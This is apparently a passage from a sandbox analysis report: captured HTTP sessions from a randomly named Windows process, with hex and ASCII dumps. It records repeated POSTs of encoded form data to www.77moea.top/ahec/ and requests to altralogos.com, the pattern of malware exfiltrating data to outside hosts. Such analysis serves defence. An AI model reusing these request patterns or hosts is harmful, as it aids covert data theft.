                                                                          Data Ascii: KHcH=6nAY1pwJurF3l4ltsG0jey/2ZANdnupvZZ8gNCW1WDommlz9MnljqJ3WMonX4QH5Qd17SEmd8y21EUaf6zWPIqTpONWgWX9NauLPk7ZbjLDflzc95g6/ZJE8Ll30FFFohrIb0qDcsXYlOsRM9mX9vr4ZGauISgfN/kn0sBZAkJyZitLBXU3/673eXB5yPM3HVNM+Ufjv5TU+nVVeVFa4uCQ4/3wfgZTgYSr+R3d5EKU07fjXYWwELb1nX4+Wav87MpI1D2G94DFV5qzhH/14vFUu1k0OgqR5GSqNtfirtiCqUSCLw3HSPBPqVR/d3Iyg1cVhRusrkRC6CTGzhrsyEKiLYP9MQTLc3Iiams90iFrrSS5X6/UtP6UtvSLocFeahT3zjRcEt96nBJBL0JNG4r6JxzECIlQUpiPmJBc3Ep77QFoXWJNWgFIa63x9SJbxZRWkxbP28L7OZ99Gt1APM4FBgp5snyNLrbxmKo+mRpYnULtJk2J6GHVE3OOeb4CZyXuCZG7g9xusq70Cr2hB70qE5FOuH5x5O3QcWKwDCVl4NZA5Qlq1d3F3+Qo/A/ZhMvPDfjpYxd5NGJ5SRk5Apb1Nvee9p2SKiUF25d6xghujvIMqKS+gaArY+s3x7OKUwflTWnbGL3aWdze8rKMC5w7G1+ecGxy1MiJULA8Ze2DlxbgXBAIJQQEwAEWGfp2JoFhNbfyOUw42VHmmtpCB/x2hbhXF54QPglNopTDfjvpvAgHX5J1Hn1JPtN2XUus8CyAP1lRakp2yEqJZJz3tEFDAlZaXIhzzV2rrwjxrSggUPzFBiHSkkU3Rh99Orhf+7DWo/UgSA/uWkxSKA62Nl/As8RMVRz+AexAntuOu7mvcrEzi5Km7goYA1o/BK8SW1IcftD0x/NN4w+HwVsrsXnlKU4lElVHek2sODY9iJRzu9lyuNkGpGv03KYTkUR2J0Ys7fT+c1cxiXeUuGQH+Uph3scdHrvIhbO5O7OEo9izOG3q9ao0XQ+fB3bTN+XwRgAxMpXDISRCGjipQ1uBevlxohGp5Gl9fbPxfRXkiskfVW0qDFMdMaj4MDfd/s7NDSgWbrI8MvYrvFsP0WXYOjgOoglB3F4FIqM7+VghO/W3+zkBweo76TLTPZVgpW4ZguxGiVH9vqBrQdvHZYJIcQmQv+UdwwaeuGhMu2PYz1r/BQkeStQ6QcfY4Rh+/
                                                                          Dec 2, 2023 18:50:46.092053890 CET1340INHTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:50:43 GMT
                                                                          Server: Apache
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                          Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"
                                                                          Upgrade: h2,h2c
                                                                          Connection: Upgrade, close
                                                                          Transfer-Encoding: chunked
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 2d 52 55 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 09 09 09 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4d 53 49 6e 70 75 74 4d 65 74 68 6f 64 43 6f 6e 74 65 78 74 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 6a 73 2f 6c 69 62 73 2f 69 65 31 31 43 75 73 74 6f 6d 50 72 6f 70 65 72 74 69 65 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 5c 2f 73 63 72 69 70 74 3e 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 50 72 65 6d 69 75 6d 20 70 6c 75 67 69 6e 20 76 31 39 2e 32 2e 31 20 28 59 6f 61 73 74 20 53 45 4f 20 76 31 39 2e 36 2e 31 29 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 72 75 5f 52 55 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22
                                                                          Data Ascii: 4000<!DOCTYPE html><html lang="ru-RU"><head><meta charset="UTF-8"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="pingback" href="http://altralogos.com/xmlrpc.php"><script>window.MSInputMethodContext && document.documentMode && document.write('<script src="http://altralogos.com/wp-content/themes/woodmart/js/libs/ie11CustomProperties.min.js"><\/script>');</script><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO Premium plugin v19.2.1 (Yoast SEO v19.6.1) - https://yoast.com/wordpress/plugins/seo/ --><title> | Altralogos</title><meta property="og:locale" content="ru_RU" /><meta property="og:title" content=" | Altralogos" /><meta property="og:site_name" content="Altralogos" /><script type="application/ld+json" class="yoast-schema-graph">{"
                                                                          Dec 2, 2023 18:50:46.092082977 CET1340INData Raw: 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6c 74 72 61 6c 6f
                                                                          Data Ascii: @context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://altralogos.com/#website","url":"https://altralogos.com/","name":"Altralogos","description":"Altralogos","potentialAction":[{"@type":"SearchAction","target":{"@type":"En
                                                                          Dec 2, 2023 18:50:46.092099905 CET1340INData Raw: 2e 31 32 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 66 69 6c 65 5f 5f 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 32 33 37 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a
                                                                          Data Ascii: .125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><link rel='stylesheet' id='elementor-icons-css' href='http://altralogos.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?v
                                                                          Dec 2, 2023 18:50:46.092118025 CET1340INData Raw: 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 64 2d 62 61 73 65 2d 64 65 70 72 65 63 61 74 65 64 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 6c
                                                                          Data Ascii: media='all' /><link rel='stylesheet' id='wd-base-deprecated-css' href='http://altralogos.com/wp-content/themes/woodmart/css/parts/base-deprecated.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='wd-elementor-base-
                                                                          Dec 2, 2023 18:50:46.092134953 CET1340INData Raw: 27 20 69 64 3d 27 77 64 2d 70 61 67 65 2d 74 69 74 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 63 73
                                                                          Data Ascii: ' id='wd-page-title-css' href='http://altralogos.com/wp-content/themes/woodmart/css/parts/page-title.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='wd-wd-search-form-css' href='http://altralogos.com/wp-content/the
                                                                          Dec 2, 2023 18:50:46.092154026 CET1340INData Raw: 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 63 73 73 2f 70 61 72 74 73 2f 6f 70 74 2d 73 63 72 6f 6c 6c 74 6f 74 6f 70 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 35 2e 34 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63
                                                                          Data Ascii: -content/themes/woodmart/css/parts/opt-scrolltotop.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='xts-google-fonts-css' href='https://fonts.googleapis.com/css?family=Inter%3A400%2C600%2C300%7CPlayfair+Display%3A40
                                                                          Dec 2, 2023 18:50:46.092195034 CET1340INData Raw: 49 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 64 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 52 53 44 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 3f
                                                                          Data Ascii: I" type="application/rsd+xml" title="RSD" href="https://altralogos.com/xmlrpc.php?rsd" /><meta name="generator" content="WordPress 6.4.1" /><meta name="theme-color" content="rgb(1,34,31)"><meta name="viewport" content="width=device-widt
                                                                          Dec 2, 2023 18:50:46.092212915 CET1340INData Raw: 70 3a 20 2d 30 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 2d 30 70 78 3b 0a 09 68 65 69 67 68 74 3a 20 63 61 6c 63 28 31 30 30 25 20 2b 20 30 70 78 29 3b 0a 7d 0a 0a 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31
                                                                          Data Ascii: p: -0px;margin-bottom: -0px;height: calc(100% + 0px);}@media (min-width: 1025px) {.whb-top-bar-inner {height: 80px;max-height: 80px;}.whb-sticked .whb-top-bar-inner {height: 40px;max-height: 40px;}.whb-he
                                                                          Dec 2, 2023 18:50:46.092331886 CET1340INData Raw: 6c 61 79 22 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 2d 2d 77 64 2d 74 69 74 6c 65 2d 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 0a 2d 2d 77 64 2d 74 69 74 6c 65 2d 63 6f 6c 6f 72 3a 23
                                                                          Data Ascii: lay", Arial, Helvetica, sans-serif;--wd-title-font-weight:600;--wd-title-color:#242424;}:root{--wd-entities-title-font:"Playfair Display", Arial, Helvetica, sans-serif;--wd-entities-title-font-weight:700;--wd-entities-title-color:#33333
                                                                          Dec 2, 2023 18:50:46.092386961 CET1340INData Raw: 74 7b 0a 2d 2d 6e 6f 74 69 63 65 73 2d 73 75 63 63 65 73 73 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 0a 7d 0a 3a 72 6f 6f 74 7b 0a 2d 2d 6e 6f 74 69 63 65 73 2d 77 61 72 6e 69 6e 67 2d 62 67 3a 72 67 62 28 32 32 35 2c 31 31 33 2c 36 35 29 3b 0a 7d 0a
                                                                          Data Ascii: t{--notices-success-color:#fff;}:root{--notices-warning-bg:rgb(225,113,65);}:root{--notices-warning-color:#fff;}:root{--wd-form-brd-radius: 35px;--wd-form-brd-width: 2px;--btn-default-color: #ff
                                                                          Dec 2, 2023 18:50:46.275626898 CET1340INData Raw: 6e 2e 77 64 2d 73 65 63 74 69 6f 6e 2d 73 74 72 65 74 63 68 20 3e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6c 75 6d 6e 2d 67 61 70 2d 64 65 66 61 75 6c 74 20 7b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 31 32 70 78 3b 0a 09 09 7d 0a 09
                                                                          Data Ascii: n.wd-section-stretch > .elementor-column-gap-default {max-width: 1212px;}.elementor-section.wd-section-stretch > .elementor-column-gap-extended {max-width: 1222px;}.elementor-section.wd-section-stretch > .elementor-column-g


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          44192.168.2.549763185.74.252.11801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:50:47.331485033 CET518OUTGET /ahec/?KHcH=3lo42cEGi68x7KhRgTNiezz9KQRWhNcycY0hNiK/Qn4Z+z7fEU9kkqncAr7zuQTFBqkfWFiGtk2IJlit7AKsEfnRPtjbaXErcA==&Vjk=-N-tntX HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Host: www.altralogos.com
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:50:47.976064920 CET547INHTTP/1.1 301 Moved Permanently
                                                                          Date: Sat, 02 Dec 2023 17:50:46 GMT
                                                                          Server: Apache
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                          X-Redirect-By: WordPress
                                                                          Upgrade: h2,h2c
                                                                          Connection: Upgrade, close
                                                                          Location: http://altralogos.com/ahec/?KHcH=3lo42cEGi68x7KhRgTNiezz9KQRWhNcycY0hNiK/Qn4Z+z7fEU9kkqncAr7zuQTFBqkfWFiGtk2IJlit7AKsEfnRPtjbaXErcA==&Vjk=-N-tntX
                                                                          Content-Length: 0
                                                                          Content-Type: text/html; charset=UTF-8


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          45192.168.2.54976434.120.55.112801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:50:54.901721954 CET782OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.77moea.top
                                                                          Origin: http://www.77moea.top
                                                                          Referer: http://www.77moea.top/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 185
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 62 36 64 5a 77 47 75 4a 75 74 74 73 4f 44 54 79 41 44 41 54 46 53 38 59 58 66 65 39 2b 63 2f 4b 73 69 48 42 65 56 67 76 37 4d 77 37 5a 30 4d 70 75 72 74 46 68 30 50 6e 65 59 6e 66 6c 6c 72 66 57 4b 58 6b 4d 76 6e 6a 38 55 31 77 4e 50 69 45 51 4c 76 67 79 5a 62 52 6c 46 6d 76 48 79 37 64 61 6e 39 78 59 64 2f 77 6b 68 53 46 31 32 64 55 65 67 51 49 4d 54 35 66 73 42 70 51 73 62 57 7a 57 45 2f 4b 42 75 6e 47 4b 63 68 4f 65 66 35 75 70 57 71 72 75 42 73 6c 66 67 6a 44 4c 72 48 66 77 6a 7a 4e 49 61 44 71 54 41 47 51 6a 42 71 36 6e 67 3d 3d
                                                                          Data Ascii: KHcH=b6dZwGuJuttsODTyADATFS8YXfe9+c/KsiHBeVgv7Mw7Z0MpurtFh0PneYnfllrfWKXkMvnj8U1wNPiEQLvgyZbRlFmvHy7dan9xYd/wkhSF12dUegQIMT5fsBpQsbWzWE/KBunGKchOef5upWqruBslfgjDLrHfwjzNIaDqTAGQjBq6ng==
                                                                          Dec 2, 2023 18:50:55.189815044 CET380INHTTP/1.1 405 Not Allowed
                                                                          Server: nginx/1.20.2
                                                                          Date: Sat, 02 Dec 2023 17:50:55 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 157
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          46192.168.2.54976534.120.55.112801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:50:57.538683891 CET802OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.77moea.top
                                                                          Origin: http://www.77moea.top
                                                                          Referer: http://www.77moea.top/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 205
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 62 36 64 5a 77 47 75 4a 75 74 74 73 50 69 6a 79 42 6b 73 54 56 43 38 62 5a 2f 65 39 33 38 2f 4f 73 69 4c 42 65 55 56 71 36 34 63 37 65 52 67 70 76 71 74 46 69 30 50 6e 47 6f 6d 58 68 6c 72 45 57 4b 72 73 4d 72 6e 6a 38 56 56 77 4e 50 53 45 52 36 76 68 79 4a 62 54 6a 46 6d 74 44 79 37 64 61 6e 39 78 59 64 37 61 6b 68 4b 46 31 46 56 55 52 69 34 4a 47 7a 35 63 6d 68 70 51 6f 62 57 33 57 45 2b 66 42 76 37 6f 4b 65 70 4f 65 65 6c 75 70 48 71 71 68 42 73 6e 51 41 69 42 4e 70 32 32 79 42 47 46 50 50 75 41 4e 41 4f 4f 69 55 47 70 67 63 4e 4a 39 31 49 4d 4b 47 58 76 52 59 2b 56 70 79 6b 73 52 42 34 3d
                                                                          Data Ascii: KHcH=b6dZwGuJuttsPijyBksTVC8bZ/e938/OsiLBeUVq64c7eRgpvqtFi0PnGomXhlrEWKrsMrnj8VVwNPSER6vhyJbTjFmtDy7dan9xYd7akhKF1FVURi4JGz5cmhpQobW3WE+fBv7oKepOeelupHqqhBsnQAiBNp22yBGFPPuANAOOiUGpgcNJ91IMKGXvRY+VpyksRB4=
                                                                          Dec 2, 2023 18:50:57.831825018 CET380INHTTP/1.1 405 Not Allowed
                                                                          Server: nginx/1.20.2
                                                                          Date: Sat, 02 Dec 2023 17:50:57 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 157
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          47192.168.2.54976634.120.55.112801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:51:00.169476986 CET1815OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.77moea.top
                                                                          Origin: http://www.77moea.top
                                                                          Referer: http://www.77moea.top/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 1217
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 62 36 64 5a 77 47 75 4a 75 74 74 73 50 69 6a 79 42 6b 73 54 56 43 38 62 5a 2f 65 39 33 38 2f 4f 73 69 4c 42 65 55 56 71 36 35 49 37 65 6a 6f 70 75 4e 78 46 6a 30 50 6e 4c 49 6d 57 68 6c 71 55 57 4f 48 67 4d 72 6a 7a 38 51 52 77 4d 73 61 45 57 50 50 68 34 4a 62 54 76 6c 6d 73 48 79 36 46 61 6e 74 31 59 63 4c 61 6b 68 4b 46 31 45 6c 55 56 77 51 4a 41 7a 35 66 73 42 70 55 73 62 57 50 57 41 71 50 42 76 50 57 4b 76 4a 4f 65 2b 31 75 73 31 79 71 2b 78 73 70 54 41 69 6a 4e 70 36 74 79 46 6e 38 50 4c 76 72 4e 43 75 4f 6e 44 7a 45 34 2b 4a 4e 69 32 38 43 50 56 76 56 51 2f 76 65 78 53 6b 49 48 52 4d 53 63 59 51 59 34 6f 4c 53 7a 55 74 67 39 55 39 78 52 76 41 50 7a 63 64 53 68 53 6e 6d 55 6f 4c 45 70 61 69 4d 2f 6e 2f 57 47 53 2b 34 6e 41 75 56 56 7a 61 64 43 71 54 64 70 45 42 6b 52 67 74 65 63 78 57 78 56 54 30 61 31 51 36 67 70 66 41 6a 75 33 4f 67 38 4d 50 78 76 6f 6c 71 6f 56 39 30 45 37 65 74 68 36 64 56 64 62 2f 49 65 56 73 74 58 78 38 5a 5a 71 57 67 52 33 79 68 64 6c 39 79 78 7a 66 55 4e 4d 4a 4d 2f 75 39 65 6c 65 44 54 50 77 75 68 32 6f 74 44 67 53 52 43 36 31 75 72 47 33 47 70 74 67 71 6b 5a 73 76 6a 4d 65 4a 6e 77 50 44 4c 6f 61 51 41 43 58 49 64 39 63 76 52 33 61 73 6e 6d 51 74 47 69 49 6b 49 35 4f 79 55 77 39 6f 5a 79 70 4c 58 44 61 56 74 54 42 70 6a 44 75 44 52 55 64 4e 61 53 30 48 49 76 71 6f 38 56 70 51 2f 41 75 37 47 66 38 36 6d 2f 54 56 2b 30 54 31 53 57 4f 62 35 79 4c 51 34 36 71 31 68 4e 31 62 6a 37 63 45 53 6c 48 4f 70 63 74 43 7a 7a 35 45 4a 36 32 79 39 68 79 52 4a 51 76 6b 53 45 6c 4d 65 69 77 63 4e 52 70 50 47 2f 61 51 4d 4d 62 74 32 44 51 76 6d 30 59 71 6f 49 64 79 39 56 4c 45 2f 48 73 61 74 57 65 51 46 42 6b 70 78 45 49 66 33 7a 58 6f 48 6c 6f 52 48 51 65 4a 41 41 30 34 51 41 2f 33 75 4c 38 50 58 64 61 76 4f 37 32 46 4e 73 41 4d 6d 54 41 43 6c 56 63 63 52 4d 35 65 6b 69 7a 73 74 34 68 32 75 6c 62 76 51 4f 6c 52 42 31 32 34 46 75 41 58 46 33 41 6a 64 61 43 58 62 2b 6e 48 67 7a 32 34 45 71 2f 62 59 59 53 39 58 7a 6d 42 71 30 68 6b 59 50 36 30 36 51 76 32 78 57 65 65 4a 33 35 74 69 31 69 4e 48 77 7a 58 58 65 73 72 2b 77 61 78 43 74 79 33 49 63 72 34 68 4b 77 78 63 75 57 73 4f 35 70 64 36 45 68 57 77 76 4c 41 52 79 47 6f 6e 52 2f 39 30 5a 66 4f 2b 43 43 59 33 52 74 58 4c 61 51 38 75 5a 6c 39 52 44 49 46 65 4e 35 74 32 68 75 4e 4c 6c 6a 36 6e 50 70 5a 43 76 55 4d 31 78 6a 61 4c 50 39 4f 6d 50 39 58 48 53 47 72 69 45 41 31 4f 6d 64 53 59 56 75 68 43 51 57 37 77 4a 6b 74 55 61 7a 51 56 4e 69 7a 34 49 2b 71 41 65 31 39 52 59 36 67 34 59 38 4d 53 79 68 61 62 54 57 53 6a 37 6c 65 2f 57 48 30 47 6e 47 55 79 5a 51 2f 68 6b 6b 4b 55 4b 67 77 79 33 4e 6b 2b 52 69 4c 77 50 74 68 71 77 46 42 41 63 38 69 4e 78 33 34 7a 47 59 30 49 57 50 62 4d 42 4a 68 52 2f 56 38 78 2f 4e 33 49 30 38 34 78 77 71 56 64 57 5a 37 55 78 76 30 63 61 6d 78 72 63 38 61 59 74 46 33 39 53 37 55 34 69 34 4d 47 2f 66 36 37 69 65 38 2f 37 30 4f 52 78 53 51 36 35 61 34 56 65 53 5a 59 7a 6d 46 53 51 4a 63 55 36 4d 54 79 52 2b 32 7a 77 71 57 50 68 64 4f 63 6c 57 46 6c 58 5a 4a 6a 39 67 6d 37 5a 4d 74 4c 55 71 46 7a 73 6a 55 34 77 39 43 74 79 7a 46 79 45 32 34 6e 62 42 65 66 41 64 37 57 2b 77 78 35 46 68 2f 47 7a 38 63 6d 50 41 6a 44 66 6c 44 47 2f 72 55 4f 36 71 4c 47 4c 45 6d 79 6b 51 57 54 2f 